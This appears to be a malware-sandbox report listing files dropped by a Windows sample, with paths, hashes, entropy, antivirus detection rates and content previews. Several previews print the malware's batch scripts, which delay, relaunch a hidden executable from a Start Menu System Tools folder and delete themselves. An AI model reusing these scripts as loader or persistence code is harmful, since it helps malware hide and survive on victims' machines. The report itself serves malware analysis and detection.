                                                        SHA-256:F4E932702616A48E94A83075230D7FAFE604CB0333B27650ABA30A3033DC94E6
                                                        SHA-512:8F5997122AD10C12B5E9980A59DCF9F3F781D1B6B09BA6DCC14C1FBD87C38BBDBDD2B81E264D638E8AB488CB49DCB4BD070CC93139A0833FCC46D2C44CA70763
                                                        Malicious:false
                                                        Preview:ddyZnuu5EiHqCkK1b0Ak2BmKE
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):25
                                                        Entropy (8bit):3.943465189601647
                                                        Encrypted:false
                                                        SSDEEP:3:xiU9jwkS3V:z0B
                                                        MD5:4D0C759621CFC73EDBB9F5F8917C18A5
                                                        SHA1:3ADA733B2BC2FD151268157F0A48DD36AF503B5B
                                                        SHA-256:2877DF1D5C769C34C61AD19E228664F1952A9A4C479C4062E4B2714E3AD17BBB
                                                        SHA-512:CEE5E4659FBF07FD5DB4FCCB0ECD0C465AD0C367D4386B114A5AB2CFD5F3CFD1FDBC0074D0BAC0F441BF047F0164B4014EE9A00499288C8E610B9A32A07098C9
                                                        Malicious:false
                                                        Preview:sxsugu7g1XU31LAwZZnwZ192Y
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):25
                                                        Entropy (8bit):4.163856189774724
                                                        Encrypted:false
                                                        SSDEEP:3:GNG/1BIeh+n:GNr5n
                                                        MD5:A6DC12D2405C32D469FA3D531F664746
                                                        SHA1:9CC3C08BCADA784E6EF8E822AF38C246356712C2
                                                        SHA-256:7CE4B4A5D7F8A6E39CCAF11F4B692B9CFC305729A20018BF2617A247ADD7D05E
                                                        SHA-512:803D8B131D7E15D404C5D46FFCB4169C56EBF86EECCEACD515BFB6E00C9DEB5371CC1BEFA7B8036A35D74D53CBEB51DA9BDE39601215287F8C89FCC6D1465CAC
                                                        Malicious:false
                                                        Preview:PzRnmlZpscEf5OcGZlmdMDz4E
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):212
                                                        Entropy (8bit):5.350610456979711
                                                        Encrypted:false
                                                        SSDEEP:6:hCRLuVFOOr+DE1JzmRXDJzPFKJSKOZG1923fRjS9h:CuVEOCDEiHAJIqh
                                                        MD5:19E8CCD308C0C0360B6D6DF5DD16787E
                                                        SHA1:17C887BEE3409CD54D04C7BE802C90E781DB242C
                                                        SHA-256:635AABCC7B1BC9F45064197527F705C7D04AD09AEF0723D9F9FF42D795A23FB0
                                                        SHA-512:2A478A3762E680BD811F7B39E8555F836E8FE4966398B9D5A9E8D8F2D5AD03C207391880DBD55BD1FAE4A4AD9022A9664BFEE4C44E0D3E25C744B4EE17B3CF6C
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\HL35FbYWw1.bat"
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):25
                                                        Entropy (8bit):4.243856189774724
                                                        Encrypted:false
                                                        SSDEEP:3:yDwcVB4GQGn:yEcT4Yn
                                                        MD5:9CB878524E7413D52F5482A7A366EAF8
                                                        SHA1:2A6BE6C058D74A44F7826A0A800D3785E957742F
                                                        SHA-256:18CC1BCB7A6BF53B0B424E69A7463631A53D578C89FC357FA1F21FBE653E5A24
                                                        SHA-512:04F05582306C1F4B0E322C9DF3488AFF317D55D9316007B49C1E1E6058278244FA30B57C408CC7F00C0A81491B72E90ED5FD875F411AC0FE4675C77BE9026988
                                                        Malicious:false
                                                        Preview:QnfOn3Ax90Wv1bZu7Uxab9jjc
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):260
                                                        Entropy (8bit):5.241995508250854
                                                        Encrypted:false
                                                        SSDEEP:6:hCijTg3Nou1SV+DE1JzmRXDJzPFKJSKOZG1923fGH:HTg9uYDEiHAJI+H
                                                        MD5:A120B5212E2448F02BE0071123B9317D
                                                        SHA1:9BE71A38EFD247D4B5B93853F8520DDBC6894DBE
                                                        SHA-256:1595A1A6DB71EE703680123629C247B7D45CCB523C3C7837D2924B4EF5E2C5D7
                                                        SHA-512:3A2DE3C680A6ECB0E8D020854148F217FD0F71282D11D8DDEC65811E41C178FC456D5A7FA624ECEC9E69782953FEE885FD9E25254429532244053669C6B13445
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\TCMSovEgtl.bat"
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):25
                                                        Entropy (8bit):4.053660689688185
                                                        Encrypted:false
                                                        SSDEEP:3:Zk1V7sT:wS
                                                        MD5:956F17A1233AB323A3B2B056F1547595
                                                        SHA1:8B654AAAC5C0FC069DBA6349E108903F7AB1B9E3
                                                        SHA-256:B8B197179FAC99E2889BEFD388BA7789FD493CC82B7E3F3D78B327D35D02BCDC
                                                        SHA-512:A84D7C0A228C8F9E414B47B4CEC4E6F748E936BD1000047BC9F552C011502A6E6251D3EE4FD395989E672A7D28F56416877F0E2531B72000140CDA53DA0B4161
                                                        Malicious:false
                                                        Preview:kS5LlETAAelqzgpbRlImvELI5
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):25
                                                        Entropy (8bit):4.133660689688186
                                                        Encrypted:false
                                                        SSDEEP:3:2K9dN5cZWJn:L9P2WJ
                                                        MD5:A87E43A284F8887978252E4DF3ECCCD4
                                                        SHA1:86FE804DBB48CAD83ED8645734C8FB1C958C91B5
                                                        SHA-256:799101D8F646A4661CE6240E00A3969F71D385A363C4734960469D807B453805
                                                        SHA-512:C89384B16ADB154D14C12812CD381EC0D8795254547ED1E731346D11CD68804C781C25992462D9B6156B24432B52FE1FF2CB96709E2B489597F13DB86D2BE749
                                                        Malicious:false
                                                        Preview:ABxpdcxnlxhLKykHS7TXpLohl
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):260
                                                        Entropy (8bit):5.271345453639224
                                                        Encrypted:false
                                                        SSDEEP:6:hCijTg3Nou1SV+DE1JzmRXDJzPFKJSKOZG1923fZEnG:HTg9uYDEiHAJIxsG
                                                        MD5:A5A4A7BAAEDF332A6F18563EDF4D06F0
                                                        SHA1:DD9807C52392A084F5BF28F00E74451C6D999A7F
                                                        SHA-256:3149FA34AD59AD747B92A067610E3B3D2557E1CE7AEFCB7A12D8705A04961BA7
                                                        SHA-512:F3815FDE2C4682712C7B5F91F2878BE9A767622EAD877B83A5D49AC6C8EC1EC9CB82D280FB582DA44B798290480A27840A7C5D466B76913BDA97117AC79EC521
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\dxSYZSKoEG.bat"
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):212
                                                        Entropy (8bit):5.317499372033229
                                                        Encrypted:false
                                                        SSDEEP:6:hCRLuVFOOr+DE1JzmRXDJzPFKJSKOZG1923fnsoh:CuVEOCDEiHAJIEG
                                                        MD5:72796FA750DB6765A34A46A978B515C7
                                                        SHA1:C5AAA3C0441277E3AFA61C21A3DB3152E44FC958
                                                        SHA-256:E24AA8251D2D507C8A620AF6A78168F2E1A8DE517B0DA2AB73A03E41DD1E3473
                                                        SHA-512:905F658D295883B28611240EAD44CCCA47BF0AB535BC6A49AA81C95A20341FB2D5EE724E080718D8784CEF955DFC8BDC53D577FA46E4E521FB9EA74F8F2F7DED
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\ibWrXDwbZz.bat"
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):25
                                                        Entropy (8bit):4.163856189774723
                                                        Encrypted:false
                                                        SSDEEP:3:hEWQCxn:Su
                                                        MD5:9EE45E4163FDEF089A81A946B2EA7597
                                                        SHA1:BE79E23E88EF8E61DE4FE2DCC093A951A901A259
                                                        SHA-256:90E641B4F637EB310FA2DE8686472B61F7A67572349566E86764F3367A8D0B15
                                                        SHA-512:FA32C8C42908212923ABF87755C1859EAF0AA6D286E0ABADBCDF7C3C21E974A00C18B2496BC653022C09B72B173EF13139CD540AD970D35CB6349A9EA282C199
                                                        Malicious:false
                                                        Preview:BzNyBMPa3wLiCbPQNTo8CDjDT
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):25
                                                        Entropy (8bit):4.243856189774723
                                                        Encrypted:false
                                                        SSDEEP:3:6kdM32n:6km32
                                                        MD5:233F71DF1CC26E98EFF30BD3C9A27A31
                                                        SHA1:3C0E847730DC84AC96D988276CBAF5871AC8F1F8
                                                        SHA-256:DA9112E0D38F3C9861D8B5B1D4050B2982A2E7E4CC6D2D6CF82D042BCB7D1B1E
                                                        SHA-512:7C43CF2D4556F5A10F8E24E2F8A26EBD3CA528DEA5C3A22EF8CBE06659542694829CA291F6117F442E532479C40A2F76C5FA751EC1C421DC73C330866928E3E6
                                                        Malicious:false
                                                        Preview:RafAxpoVNR7P3ZkTiNAwvtfib
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):260
                                                        Entropy (8bit):5.268442040169365
                                                        Encrypted:false
                                                        SSDEEP:6:hCijTg3Nou1SV+DE1JzmRXDJzPFKJSKOZG1923fBDkRH:HTg9uYDEiHAJIdq
                                                        MD5:2BA3BB9354286C8A172244F3F3870033
                                                        SHA1:3080741D37E44AD86E79CA680B3DC85FEBDF25B5
                                                        SHA-256:0D81D4B75CFA4F42A1BDF1391647C9CE6D2089F7E1157A70E24921009BCBF119
                                                        SHA-512:DFCD4E14545D47E66CB8BD45FE13EA6970D073D5106CE2BC8394A9C6672EA06B7A74F340D2ED4048D2DDDE0FC4AF51E1467EEE8157761416E7BD93C44860C495
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\tOMWzubzd4.bat"
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):212
                                                        Entropy (8bit):5.316722027522001
                                                        Encrypted:false
                                                        SSDEEP:6:hCRLuVFOOr+DE1JzmRXDJzPFKJSKOZG1923ftpq:CuVEOCDEiHAJIHq
                                                        MD5:4A1B587AF322EEAFFD0608FEFE8EB6F0
                                                        SHA1:ABE126D01F693F29F2BE1E308CAD45B4493DDBBE
                                                        SHA-256:E83BF55BAF4F34B324E39DC9E94A42D270F09CCCA8D4BE0D68FA5C4AB6EC0475
                                                        SHA-512:641E9B39AFD770F5F9BB2A9D0A634B665D673E15E5554ED1CDEB80816648EBBAA977C19AFDC766A5C993123AFD9EF81BDB848455C344FA07FB272867CFC4B891
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\uHdcbfRrII.bat"
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):260
                                                        Entropy (8bit):5.286508226551442
                                                        Encrypted:false
                                                        SSDEEP:6:hCijTg3Nou1SV+DE1JzmRXDJzPFKJSKOZG1923fPH:HTg9uYDEiHAJI3H
                                                        MD5:C12DB08830F56326F9316B6F5BF253E7
                                                        SHA1:C2AD9FE9D34D61733595EB6CE53BB6A64126E399
                                                        SHA-256:D4FCFCCEA22CAD5BB0B128F7CACB5FAAA0F944FC53E1ADE7DB1E0848E07697DA
                                                        SHA-512:92A33FADAC634A4D8C90A16C67E720D450D516B6E90CEEA7B5CD8CFDBFFDA272188B058D137680F570BFE2A8E09A0FEAE8B6BC3C69F83F133B6A90B25BE152CC
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\yFJPVaLwHB.bat"
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):260
                                                        Entropy (8bit):5.262274935702472
                                                        Encrypted:false
                                                        SSDEEP:6:hCijTg3Nou1SV+DE1JzmRXDJzPFKJSKOZG1923fg:HTg9uYDEiHAJIY
                                                        MD5:9E834F480DF6C7A8E6DA65C4EF5BA915
                                                        SHA1:ED3AD26BBEA9823ECA18D8A5111F9CD81D433F5B
                                                        SHA-256:D3C34BB9F32046481C32E8345C20F19E4277299659B58B48DF6E3DEBA159AE87
                                                        SHA-512:4536C449EFB285B44DF4586CFD23C86FFEE3682A4B9E13D45030B7A4F9868F459ED0996CFBC078D6B4B83417CA489F5012CA8945EE64694C0C0E55F152C5FA49
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\ybJBPcXt9a.bat"
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):260
                                                        Entropy (8bit):5.27696820394485
                                                        Encrypted:false
                                                        SSDEEP:6:hCijTg3Nou1SV+DE1JzmRXDJzPFKJSKOZG1923fhQRHn:HTg9uYDEiHAJIKRH
                                                        MD5:1C7FB64D63FC8129E944BF072657BB9E
                                                        SHA1:3F6AD78CF29797D6B61120D6BF9CE98FA85F36E0
                                                        SHA-256:1947F616EA17AE251111BF8139CAAD852F0E5DDAB92A0A7E8C80965209F6BAE2
                                                        SHA-512:1A61BE834998E811034B6984AC8B3D6AD89DDC4421C0FB344D2D6842EABE31864A2C96A2FFBF5693CDA39BFA7CA1A14857B17267F46893934DB9A8BC6AC71617
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\znx0BCuWHE.bat"
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:ASCII text, with very long lines (442), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):442
                                                        Entropy (8bit):5.871430465875405
                                                        Encrypted:false
                                                        SSDEEP:12:NLOqHq2YAywpk2rze1jjtHS50TY/PgQd87f:VOqHq2z7pj3MjjtHSCTsPZ6
                                                        MD5:70550185C6FFF6621875B76399AE6346
                                                        SHA1:A8129ACF71C30C5D8661E7BDE730F7E6F4BF381C
                                                        SHA-256:D9098D7CAD06BF3A20B9649926FFDC40BCA574C82AF6F13197B738021C17C145
                                                        SHA-512:EFD1A394BCD1F05BD19671BC4B387F306769F6A1146CD2BE2034D54DB5AD41E1F9EFD5F2110CE35FCFF3AFBDB82CC6926EF412CF306CC4E2748E43E6CDBA20C1
                                                        Malicious:false
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):3923968
                                                        Entropy (8bit):7.839804583223067
                                                        Encrypted:false
                                                        SSDEEP:49152:zh3Lmrp7Qvsdng2u6ydyscQVnzrVGU14AyH9XsBgkpFvyA1nSiF:zhC54An5pydy/QVnv4K0HxAJzqA1SiF
                                                        MD5:832D64C5F330BE9505301104FCFC574A
                                                        SHA1:DE70A17B5E6F2186BB611E9BFACDCFE6B4FD9ED2
                                                        SHA-256:29472C5E2C502ED00E6E34E4C8EF71BE0E94A0971F548DF68689AAF23B8F1064
                                                        SHA-512:DE814A248871D7902E79E98C04DD1ADD6EA7C370EEA47BBF278CB433D0F0F7E201479DCD312A4FFB6AD94CE5C15F07FF17D4D156472B26EF2EE3C3A26BE87C4E
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 71%
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:true
                                                        Preview:[ZoneTransfer]....ZoneId=0
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):70144
                                                        Entropy (8bit):5.909536568846014
                                                        Encrypted:false
                                                        SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                        MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                        SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                        SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                        SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                        Joe Sandbox View:
                                                        • Filename: FuWRu2Mg82.exe, Detection: malicious
                                                        • Filename: auXl1Tzyme.exe, Detection: malicious
                                                        • Filename: oLlotc8NO3.exe, Detection: malicious
                                                        • Filename: qZoQEFZUnv.exe, Detection: malicious
                                                        • Filename: w49A5FG3yg.exe, Detection: malicious
                                                        • Filename: 9XHFe6y4Dj.exe, Detection: malicious
                                                        • Filename: 12Vjq7Yv2E.exe, Detection: malicious
                                                        • Filename: 7WyBcig6e3.exe, Detection: malicious
                                                        • Filename: kBY9lgRaca.exe, Detection: malicious
                                                        • Filename: lv961v43L3.exe, Detection: malicious
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):32768
                                                        Entropy (8bit):5.645950918301459
                                                        Encrypted:false
                                                        SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                        MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                        SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                        SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                        SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 29%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):32256
                                                        Entropy (8bit):5.631194486392901
                                                        Encrypted:false
                                                        SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                        MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                        SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                        SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                        SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 24%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):40448
                                                        Entropy (8bit):5.7028690200758465
                                                        Encrypted:false
                                                        SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                        MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                        SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                        SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                        SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 12%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):33792
                                                        Entropy (8bit):5.541771649974822
                                                        Encrypted:false
                                                        SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                        MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                        SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                        SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                        SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 38%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):23552
                                                        Entropy (8bit):5.529329139831718
                                                        Encrypted:false
                                                        SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                        MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                        SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                        SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                        SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):70144
                                                        Entropy (8bit):5.909536568846014
                                                        Encrypted:false
                                                        SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                        MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                        SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                        SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                        SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):46592
                                                        Entropy (8bit):5.870612048031897
                                                        Encrypted:false
                                                        SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                        MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                        SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                        SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
